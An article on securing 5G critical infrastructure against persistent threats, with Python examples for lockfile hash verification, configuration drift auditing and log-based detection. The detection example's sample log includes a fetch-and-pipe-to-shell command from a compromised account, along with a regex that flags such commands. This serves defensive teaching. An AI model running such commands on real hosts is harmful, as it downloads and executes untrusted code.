
Evolving the security posture for critical infrastructure

5G is critical infrastructure that provides the foundation of society, supporting economies, public safety, healthcare, utilities and our everyday lives. Maintaining the security of this infrastructure is becoming increasingly challenging due to the evolution of advanced persistent threats (APTs). Network operators, as well as the hardware and software suppliers of those networks, should assume the adversary is already in the network—because they are.

The challenge

The defining challenge of an APT is that an external threat actor who breaches the perimeter becomes an internal one, able to persist, escalate privileges and move laterally through the network while blending in with legitimate activity. The problem is exacerbated in a multistakeholder deployment, where operators, hardware suppliers, software suppliers and cloud providers may have differing security postures and unclear assignment of responsibilities, so a gap in one party's controls becomes everyone's exposure. Increased due diligence is therefore needed to secure critical infrastructure in open, cloud-native, multivendor deployments.

The response

The telecom industry was already on its path to building secure networks to protect our nation’s mobile critical infrastructure from sophisticated attacks, and recent APT attacks have strengthened the industry’s resolve. The best defense against APTs is to build in security using a multipronged approach based on guidance from U.S. federal agencies:

1. Implement Zero Trust Architecture (ZTA)

Zero Trust Architecture, described by the National Institute of Standards and Technology (NIST) in 2020 (NIST SP 800-207), is a set of design principles rather than a product or a single network feature: no user, device or workload is trusted because of its network location, and every access is authenticated, authorized and continuously re-evaluated. Implemented end to end, it removes the weak points of entry that can serve as a beachhead to the rest of the network. Its primary strength is that it treats internal and external requests alike, as if the adversary were already inside. The U.S. Department of Homeland Security (DHS), through its component the Cybersecurity and Infrastructure Security Agency (CISA), recommends that operators and their suppliers follow the Zero Trust Maturity Model, which charts the move from a traditional posture to an optimal one in four incremental stages across five pillars: identity, devices, networks, applications and workloads, and data.

2. Follow secure software development processes

Reducing the number of exploitable vulnerabilities through secure software development limits what an APT can do once inside the network. Secure software development best practices have been made publicly available by the Business Software Alliance (BSA), the Open Web Application Security Project (OWASP) and SAFECode. A fundamental practice is the secure consumption of third-party software, particularly Free and Open Source Software (FOSS), which is frequently not maintained with security as a priority: know which components a product contains, take each one only from a trusted source at a pinned version whose integrity is verified before use, and track those components for newly published vulnerabilities for as long as the product is deployed.
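The integrity check behind "pinned version, verified before use", as an added example that is not code from the original article or from any of the organizations it names. It mimics the `--hash=sha256:` syntax of a pip requirements lockfile; the package names, artifact bytes and digests are constructed for the demonstration and are not real releases.

```python
"""Verify third-party artifacts against a hash-pinned lockfile before they are consumed.

Added example, not code from the original article. The lockfile syntax mirrors
pip's ``name==version --hash=sha256:<hex>`` lines; packages and bytes are constructed.
"""
import hashlib
import hmac
import re

# Constructed stand-ins for downloaded wheels/tarballs (name -> raw bytes).
ARTIFACTS = {
    "netconf-client": b"constructed wheel bytes for netconf-client 2.4.1",
    "yang-tools": b"constructed wheel bytes for yang-tools 0.9.3",
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed lockfile: every requirement carries an exact version and a digest.
LOCKFILE = (
    "# requirements.lock (constructed sample)\n"
    f"netconf-client==2.4.1 --hash=sha256:{sha256_hex(ARTIFACTS['netconf-client'])}\n"
    f"yang-tools==0.9.3 --hash=sha256:{sha256_hex(ARTIFACTS['yang-tools'])}\n"
)
# Same lockfile with a floating, unhashed requirement appended; this must be refused.
UNPINNED_LOCKFILE = LOCKFILE + "metrics-exporter>=1.0\n"

# Only exact pins with a 64-hex-digit SHA-256 are accepted.
LINE_RE = re.compile(
    r"^(?P<name>[A-Za-z0-9_.-]+)==(?P<ver>\S+)\s+--hash=sha256:(?P<digest>[0-9a-f]{64})$"
)


def parse_lockfile(text: str) -> dict:
    """Return {name: (version, digest)}; raise ValueError on any line that is not exactly pinned."""
    pinned = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"refusing unpinned or unhashed requirement: {line!r}")
        pinned[m["name"]] = (m["ver"], m["digest"])
    return pinned


def lockfile_is_strict(text: str) -> bool:
    """True if every requirement in `text` is exactly pinned and hashed."""
    try:
        parse_lockfile(text)
        return True
    except ValueError:
        return False


def verify_artifact(name: str, data: bytes, pinned: dict) -> bool:
    """True only if `name` is listed in the lockfile and its bytes match the pinned digest."""
    if name not in pinned:
        return False  # never install something the lockfile does not list
    _, expected = pinned[name]
    # Constant-time comparison; not strictly needed for a public digest but a good habit.
    return hmac.compare_digest(sha256_hex(data), expected)


def verify_all(artifacts: dict, pinned: dict) -> list:
    """Return the names that failed verification (an empty list means safe to consume)."""
    return sorted(n for n, d in artifacts.items() if not verify_artifact(n, d, pinned))


if __name__ == "__main__":
    pinned = parse_lockfile(LOCKFILE)
    print("failed:", verify_all(ARTIFACTS, pinned))
    print("strict:", lockfile_is_strict(UNPINNED_LOCKFILE))
```

The point of refusing the `>=1.0` line rather than warning about it is that a floating requirement lets a compromised upstream release walk into the build unnoticed; a pinned digest turns that into a hard failure at consumption time. In a real pipeline the digests come from the upstream project's signed release metadata or a previously reviewed build, never from the download itself.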

3. Apply industry best practices for hardening

APT exploitation can be mitigated through timely vulnerability patching, credential hygiene (unique, non-default passwords and, wherever possible, key- or certificate-based authentication) and configuration hardening. Configuration hardening is achieved in two steps: first, plan and set a security baseline configuration; then continuously audit the deployed configuration for changes and drift away from that baseline. Maintaining the baseline is fundamental, and so is visibility into every change that deviates from it, because an attacker who has gained access will often loosen settings (re-enable a disabled service, add an account, widen a permission) in order to persist. Identity and access management configuration should be the highest priority, as it is a common attack vector. CISA has published hardening guidance for securing products, as has the U.S. National Security Agency (NSA), including their joint Kubernetes Hardening Guide, which applies directly to cloud-native network functions.
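The two-step baseline-then-audit loop in code, as an added example that is not from the original article and does not reproduce any CISA or NSA benchmark. The baseline values and the "live" sshd_config-style text are constructed; the specific settings are illustrative assumptions chosen because they concern identity and access, which the passage flags as the highest priority.

```python
"""Audit a live configuration against a security baseline and report drift.

Added example, not code from the original article or from CISA/NSA guidance.
Baseline, IAM key set and live config are constructed for the demonstration.
"""

# Constructed security baseline: setting -> required value.
BASELINE = {
    "PermitRootLogin": "no",
    "PasswordAuthentication": "no",
    "PubkeyAuthentication": "yes",
    "MaxAuthTries": "3",
    "X11Forwarding": "no",
}

# Settings in the identity-and-access area; drift here is reported as high severity.
IAM_KEYS = {"PermitRootLogin", "PasswordAuthentication", "PubkeyAuthentication", "MaxAuthTries"}

# Constructed 'live' configuration as read from the host. Note what has drifted:
# root login re-enabled, MaxAuthTries raised, PubkeyAuthentication line removed.
LIVE_CONFIG = """
# sshd_config (constructed sample)
Port 22
PermitRootLogin yes
PasswordAuthentication no
MaxAuthTries 6
X11Forwarding no
"""


def parse_config(text: str) -> dict:
    """Parse 'Key value' lines into {lowercased key: value}; comments and blanks are ignored.
    On duplicate keys the last occurrence wins, matching how most daemons read a file."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        cfg[parts[0].lower()] = parts[1].strip() if len(parts) > 1 else ""
    return cfg


def audit(baseline: dict, live_text: str, iam_keys=IAM_KEYS) -> list:
    """Return findings (key, expected, actual, severity) for every deviation from baseline.
    A missing key is drift too: the daemon's built-in default may be weaker than the baseline."""
    live = parse_config(live_text)
    findings = []
    for key, expected in baseline.items():
        actual = live.get(key.lower())
        if actual is None or actual.lower() != expected.lower():
            severity = "high" if key in iam_keys else "medium"
            findings.append((key, expected, actual, severity))
    return findings


def new_drift(previous: list, current: list) -> list:
    """Findings present in `current` but not in `previous`: what changed since the last audit run.
    This is the continuous part: each run compares against the last known state, not only the baseline."""
    seen = set(previous)
    return [f for f in current if f not in seen]


if __name__ == "__main__":
    for key, expected, actual, severity in audit(BASELINE, LIVE_CONFIG):
        print(f"[{severity}] {key}: expected {expected!r}, found {actual!r}")
```

Running it against the constructed file reports three high-severity findings (root login enabled, missing `PubkeyAuthentication`, `MaxAuthTries` raised). The missing-key case matters in practice: deleting a hardening line is a quieter way to weaken a host than changing its value, and an audit that only diffs present keys will not see it.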

4. Continuously monitor for visibility

Because an APT, once inside, looks like an internal actor, end-to-end visibility through continuous monitoring of the network, workloads and users is necessary. A security management system for operations supports the identify, protect, detect, respond and recover functions of the NIST Cybersecurity Framework, applied to the microperimeter of each network asset and to the cloud-native infrastructure itself. Continuous logging of access attempts, privilege changes and command execution, correlated across hosts, gives both rule-based analytics and AI-based detection the data they need to flag anomalous behaviour in near real time: an account appearing on a host it has never used, a burst of failed logins followed by a success, or a login sourced from an internal server rather than from a jump host.
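A small detection pass over access and command logs, as an added example that is not code from the original article and is not any product's detection engine. The log lines, host names (`bastion`, `cu-up-01`, `amf-02`), the known-access table and the jump-host list are all constructed; the rules are simple heuristics for the behaviours the passage describes, not a full anomaly-detection model.

```python
"""Rule-based detection of APT-style behaviour over constructed auth/command logs.

Added example, not code from the original article. Log format, host inventory,
known-access table and thresholds are assumptions made for the demonstration.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log: key=value records emitted by a central log collector.
LOGS = """\
2024-03-01T02:10:05Z auth user=ops1 src=10.0.9.5 dst=bastion result=success
2024-03-01T02:10:41Z auth user=ops1 src=bastion dst=cu-up-01 result=success
2024-03-01T02:11:02Z cmd user=ops1 host=cu-up-01 cmd="kubectl get pods -A"
2024-03-01T02:11:30Z auth user=svc-backup src=cu-up-01 dst=amf-02 result=failure
2024-03-01T02:11:33Z auth user=svc-backup src=cu-up-01 dst=amf-02 result=failure
2024-03-01T02:11:37Z auth user=svc-backup src=cu-up-01 dst=amf-02 result=success
2024-03-01T02:12:10Z cmd user=svc-backup host=amf-02 cmd="curl -s http://10.0.9.77/agent.sh | sh"
"""

# Constructed environment knowledge a SOC would maintain.
KNOWN_ACCESS = {("ops1", "bastion"), ("ops1", "cu-up-01"), ("svc-backup", "backup-01")}
INTERNAL_HOSTS = {"bastion", "cu-up-01", "amf-02", "backup-01"}
JUMP_HOSTS = {"bastion"}  # the only internal hosts that may legitimately originate logins
FAIL_WINDOW = timedelta(minutes=2)
FAIL_THRESHOLD = 2
SUSPICIOUS_CMD = re.compile(r"\|\s*(sh|bash)\b|base64\s+-d")

EVENT_RE = re.compile(r"^(?P<ts>\S+) (?P<kind>auth|cmd) (?P<rest>.*)$")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_events(text: str) -> list:
    """Parse log lines into dicts with a timezone-aware 'ts' and a 'kind' of auth or cmd."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue  # unparseable lines are skipped here; a real pipeline would count them
        fields = {k: v.strip('"') for k, v in KV_RE.findall(m["rest"])}
        fields["ts"] = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
        fields["kind"] = m["kind"]
        events.append(fields)
    return events


def detect(events: list, known_access=KNOWN_ACCESS, internal_hosts=INTERNAL_HOSTS,
           jump_hosts=JUMP_HOSTS) -> list:
    """Return alerts as (ts, rule, user, detail) tuples, in event order."""
    alerts = []
    failures = defaultdict(deque)  # (user, src, dst) -> timestamps of recent failed logins
    for e in events:
        if e["kind"] == "auth":
            key = (e["user"], e["src"], e["dst"])
            if e["result"] == "failure":
                failures[key].append(e["ts"])
                continue
            recent = failures[key]
            while recent and e["ts"] - recent[0] > FAIL_WINDOW:
                recent.popleft()  # forget failures outside the window
            if len(recent) >= FAIL_THRESHOLD:
                alerts.append((e["ts"], "success-after-failures", e["user"],
                               f"{len(recent)} failures then success on {e['dst']} from {e['src']}"))
            recent.clear()
            if (e["user"], e["dst"]) not in known_access:
                alerts.append((e["ts"], "new-host-for-account", e["user"],
                               f"{e['user']} has no history on {e['dst']}"))
            if e["src"] in internal_hosts and e["src"] not in jump_hosts:
                alerts.append((e["ts"], "lateral-hop", e["user"],
                               f"login to {e['dst']} originated from server {e['src']}"))
        elif e["kind"] == "cmd" and SUSPICIOUS_CMD.search(e.get("cmd", "")):
            alerts.append((e["ts"], "suspicious-command", e["user"],
                           f"on {e['host']}: {e['cmd']}"))
    return alerts


if __name__ == "__main__":
    for ts, rule, user, detail in detect(parse_events(LOGS)):
        print(f"{ts.isoformat()} {rule:24} {user:12} {detail}")
```

On the constructed log the `ops1` session (workstation to bastion to a node, then a read-only `kubectl`) raises nothing, while the `svc-backup` activity fires all four rules on two events: a service account succeeding after repeated failures, on a host it has never used, from an internal server that is not a jump host, and then piping a downloaded script into a shell. Each rule alone is noisy; the value is in the correlation across access and command logs for the same identity, which is exactly what end-to-end visibility has to provide.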
